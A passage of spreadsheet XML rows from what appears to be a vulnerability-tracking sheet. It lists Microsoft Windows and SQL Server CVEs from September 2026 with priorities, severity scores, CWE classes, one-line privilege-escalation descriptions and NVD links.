      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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87" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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9" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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0" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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1" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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7" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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8" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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9" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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00" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77485</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K303" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
